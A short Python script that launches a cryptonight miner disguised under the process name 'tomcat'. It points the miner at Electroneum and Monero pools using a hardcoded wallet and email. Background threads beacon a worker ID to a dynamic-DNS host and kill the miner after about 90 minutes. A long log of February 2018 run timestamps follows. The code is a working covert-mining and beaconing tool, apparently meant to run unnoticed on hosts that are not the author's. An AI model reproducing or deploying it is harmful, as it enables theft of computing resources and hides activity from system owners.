import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:04.114941
#2018-02-17 16:10:06.230312
#2018-02-17 17:59:01.499857
#2018-02-17 19:46:05.144718
#2018-02-17 21:34:06.080383
#2018-02-17 23:19:04.567955
#2018-02-18 01:07:06.815533
#2018-02-18 02:54:05.486389
#2018-02-18 04:43:06.243321
#2018-02-18 06:35:06.986956
#2018-02-18 08:23:06.428168
#2018-02-18 10:12:03.805746
#2018-02-18 11:58:05.938389
#2018-02-18 13:43:01.583589
#2018-02-18 15:35:09.386199
#2018-02-18 17:24:06.440731
#2018-02-18 19:13:03.273169
#2018-02-18 20:59:05.960136
#2018-02-18 22:46:06.388491
#2018-02-19 00:35:06.427185
#2018-02-19 02:21:06.660957
#2018-02-19 04:08:03.897354
#2018-02-19 05:52:07.405868
#2018-02-19 07:40:09.479043
#2018-02-19 09:30:07.616791
#2018-02-19 11:19:08.161752
#2018-02-19 13:07:09.185029
#2018-02-19 14:55:08.183409
#2018-02-19 16:42:04.113833
#2018-02-19 18:28:10.436095
#2018-02-19 20:14:07.216892
#2018-02-19 22:03:07.461194
#2018-02-19 23:48:07.120400
#2018-02-20 01:36:04.145082
#2018-02-20 03:24:05.603039
#2018-02-20 05:11:06.076205
#2018-02-20 06:54:04.494058
#2018-02-20 08:41:08.905739
#2018-02-20 10:25:09.123671
#2018-02-20 12:10:09.925569
#2018-02-20 13:59:09.259227
#2018-02-20 15:43:07.332060
#2018-02-20 17:29:10.852948
#2018-02-20 19:17:06.038257
#2018-02-20 21:05:02.884649
#2018-02-20 22:49:06.109678
#2018-02-21 00:33:06.592030
#2018-02-21 02:18:08.049188
#2018-02-21 04:07:01.433070
#2018-02-21 05:54:06.647777
#2018-02-21 07:42:05.128482
#2018-02-21 09:27:02.191298
#2018-02-21 11:16:05.601705
#2018-02-21 13:03:08.330893
#2018-02-21 14:50:08.507019
#2018-02-21 16:37:04.272717
#2018-02-21 18:28:04.530336
#2018-02-21 20:13:06.640072
#2018-02-21 22:02:07.841537
#2018-02-21 23:49:02.111025
#2018-02-22 01:38:07.999485
#2018-02-22 03:25:08.833903
#2018-02-22 05:12:04.512328
#2018-02-22 06:56:05.264056
#2018-02-22 08:43:04.457800
#2018-02-22 10:29:06.991920
#2018-02-22 12:14:06.868127
#2018-02-22 13:59:06.479079
#2018-02-22 15:46:08.884330
#2018-02-22 17:32:07.318950
#2018-02-22 19:18:06.379961
#2018-02-22 21:09:01.270839
#2018-02-22 22:54:02.093631
#2018-02-23 00:42:10.157670
#2018-02-23 02:28:06.727148
#2018-02-23 04:17:07.091261
#2018-02-23 06:04:06.733071
#2018-02-23 07:51:07.135709
#2018-02-23 10:08:01.544829
#2018-02-23 11:58:07.552667
#2018-02-23 13:47:07.011812
#2018-02-23 15:37:04.244000
#2018-02-23 17:25:06.427588
#2018-02-23 19:10:06.446242
#2018-02-23 20:54:08.234442
#2018-02-23 22:38:03.993458
#2018-02-24 00:24:08.064107
#2018-02-24 02:16:07.042266
#2018-02-24 04:05:07.821518
#2018-02-24 05:49:06.843414
#2018-02-24 07:40:08.142355
#2018-02-24 09:25:04.264222
#2018-02-24 11:18:08.015183
#2018-02-24 13:07:05.604342
#2018-02-24 14:56:02.100374
#2018-02-24 16:46:03.384403
#2018-02-24 18:34:05.228352
#2018-02-24 20:22:03.790926
#2018-02-24 22:18:03.530227
#2018-02-25 01:26:06.743100
#2018-02-25 05:00:04.443017
#2018-02-25 09:41:01.391074